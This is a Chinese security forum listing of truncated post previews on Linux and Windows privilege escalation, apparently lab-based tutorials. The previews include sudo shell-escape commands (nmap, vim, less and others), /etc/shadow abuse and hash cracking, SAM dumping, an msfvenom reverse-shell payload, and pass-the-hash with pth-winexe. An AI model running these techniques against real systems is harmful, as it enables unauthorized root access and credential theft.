-
sudo提权 - apache2
在没有 shell 转义序列的情况下,可以使用sudo来操作apache2进行提权: sudo apache2 -f /etc/shadow john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt...- REX_Null1
- 0
- 0
- 19
-
sudo提权 - more
more,是linux的一个命令,类似cat命令,会以一页一页的显示,方便使用者逐页阅读。 直接按shift+1,感叹号!进行输入命令 !/bin/sh 回车后 ...- REX_Null1
- 0
- 0
- 2
-
sudo提权 - nmap
nmap是网络扫描和嗅探工具包 #nmap的sudo提权命令(禁用输入回显) TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF #nmap的sudo提权命令(利用nmap版本2.02至5.21的交互模式) sudo nmap --interactive nmap…...- REX_Null1
- 0
- 0
- 2
-
sudo提权 - ftp
FTP 是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。 sudo提权 - ftp sudo ftp !/bin/sh ...- REX_Null1
- 0
- 0
- 0
-
sudo提权 - less
less工具是对文件或者其他输出进行分页显示的工具 sudo less /etc/profile 回车一下就会看到底部有个: 输入 !/bin/sh ...- REX_Null1
- 0
- 0
- 3
-
sudo提权 - man
man 命令是 Linux 下的帮助指令,通过 man 指令可以查看 Linux 中的指令帮助、配置文件帮助和编程帮助等信息。 sudo man man !/bin/sh ...- REX_Null1
- 0
- 0
- 2
-
sudo提权 - vim
vim是目前我们使用比较多的是 vim 编辑器。 ,vim内设的各种功能是vim具有非常强大的编辑能力,让我们快速的完成各种编辑任务。 #方法一:输入sudo vim,然后在vim编辑器界面按下Shift键加" : "键,接着输入"!sh",按下回车即可 sudo vim :!sh #用:!bash也可以 whoami #方法二:输入以下命令,执行即可 su…...- REX_Null1
- 0
- 0
- 0
-
sudo提权 - nano
nano 是一个字符终端的文本编辑器,是Pico的复制品;它比vi/vim要简单得多,比较适合Linux 初学者使用,某些Linux发行版的默认编辑器就是nano。 sudo nano ctrl+r ctrl+x 看到这个界面 就可以执行命令了 ...- REX_Null1
- 0
- 0
- 1
-
sudo提权 - find
find 命令用于在指定目录下查找文件和目录。 提权利用 收集具有SUID权限的文件 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ; /表示从文件系统的顶部(根)开…...- REX_Null1
- 0
- 0
- 1
-
sudo提权 - iftop
iftop 是一个用于实时监视网络流量的工具。 shift+1也就是!感叹号可以执行命令。 命令输入: sudo iftop 然后可以看到一个流量监控的界面 然后按下 Shift+1 感叹号! 可以调出命令行 接下来输入 ! /bin/sh 直接提权 ...- REX_Null1
- 0
- 0
- 0
-
弱文件权限 - 可写 /etc/passwd 提权
/etc/passwd 文件包含用户账户信息。它是可读的,但通常只有 root 用户才能写入。历史上,/etc/passwd 文件包含用户密码哈希值,一些 Linux 版本仍允许在其中存储密码哈希值。 请注意,/etc/passwd 文件是可写的: ls -l /etc/passwd 运行结果: user@debian:~$ ls -l /etc/passwd -rw-r--rw- 1 root …...- REX_Null1
- 0
- 0
- 0
-
弱文件权限 - 可写 /etc/shadow 提权
/etc/shadow 文件包含用户密码哈希值,通常只有 root 用户才能读取该文件。 请注意,虚拟机上的 /etc/shadow 文件是可写的: ls -l /etc/shadow 运行结果: user@debian:~$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~$ …...- REX_Null1
- 0
- 0
- 1
-
弱文件权限 - 可读 /etc/shadow 提权
/etc/shadow文件包含用户密码哈希,通常只有root用户才能读取。 请注意,环境里的/etc/shadow文件可由全部用户读取: ls -l /etc/shadow 运行结果: user@debian:~$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~$ 查看/e…...- REX_Null1
- 0
- 0
- 0
-
mysql UDF提权
拿到普通user权限,sudo一下,再看下进程 user@debian:~$ ps -aux | grep sql Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html root 1906 0.0 0.1 9180 1396 ? S 00:56 0:00 /bin/sh /u…...- REX_Null1
- 0
- 0
- 0
-
Rogue Potato - 土豆提权
4:35当前帖子内容 Rogue Potato是使用欺骗攻击的攻击名称 同时进行NTLM中继攻击以获得系统权限 该攻击诱使Windows作为系统进行身份验证 用户使用NTLM访问一个假的HTTP服务器;NTLM凭据 然后NTLM凭据将其转告到SMB以获得命令执行 提权条件 1.本地NTLM中继获取SYSTEM令牌 2.SeImpersonatePrivilege特权 测试中任意用户都可以通过本地N…...- REX_Null1
- 0
- 0
- 10
-
SAM和SYSTEM文件进行备份读取
视频播放至7:15后才是该帖子内容 Security Accounts Manager又称SAM,用于存储本地用户帐户的安全信息。 这些哈希用密钥加密的,但这个密钥可以在SYSTEM的文件中找到。 如果你能读取到SAM和系统文件,则可以提取到哈希的密码。 SAM/SYSTEM Locations SAM和SYSTEM文件位于C:\\Windows\\System32\\config directo…...- REX_Null1
- 0
- 0
- 1
-
利用存储的凭证提升权限
通过存储凭证提升权限 RunAs 通过存储凭证提升权限 在目标主机传shell弹回来后,我们应该立即开始执行手动枚举,以便在我们开始使用工具之前更好地了解我们正在使用的是什么。 这挺重要,因为搜索存储的凭据应该是获得据点前首先执行的手动命令之一。 手动枚举存储的凭据 查找存储的凭据可以使用一个简单的命令来完成: cmdkey /list 这里我们可以看到本地Admin账户的凭证已经存储,可以用来执…...- REX_Null1
- 0
- 0
- 1
-
利用可执行服务文件提权
利用可执行服务文件提权 我们的服务启动的时候是伴随着一个exe文件启动的,而我们如果对这个exe文件和目录有可写权限就可以用恶意文件去覆盖掉正常的文件进行提权 msf生成shell root@ip-10-10-4-200:~/Desktop# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.4.200 LPORT=6666 -f exe …...- REX_Null1
- 0
- 0
- 0
-
弱服务权限daclsvc提权
弱服务权限daclsvc提权 模拟获取到内网机器 xfreerdp连接上去 xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130 root@ip-10-10-25-36:~/Desktop# xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130 connect…...- REX_Null1
- 0
- 0
- 1
-
哈希传递 - PassThe Hash
既然可以使用哈希进行身份验证,为什么还要破解密码哈希? winexe winexe在kali里面自带,用于在linux平台连接windows机器 环境要求:开启文件共享,即smb服务;禁用UAC远程限制 将完整的管理员哈希与 pth-winexe 一起使用,以生成一个以管理员身份运行的 shell,而无需破解其密码。 请记住,完整哈希包括 LM 和 NTLM 哈希,以冒号分隔: pth-winex…...- REX_Null1
- 0
- 0
- 0
幸运之星正在降临...
点击领取今天的签到奖励!
恭喜!您今天获得了{{mission.data.mission.credit}}积分
我的优惠劵
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×
没有优惠劵可用!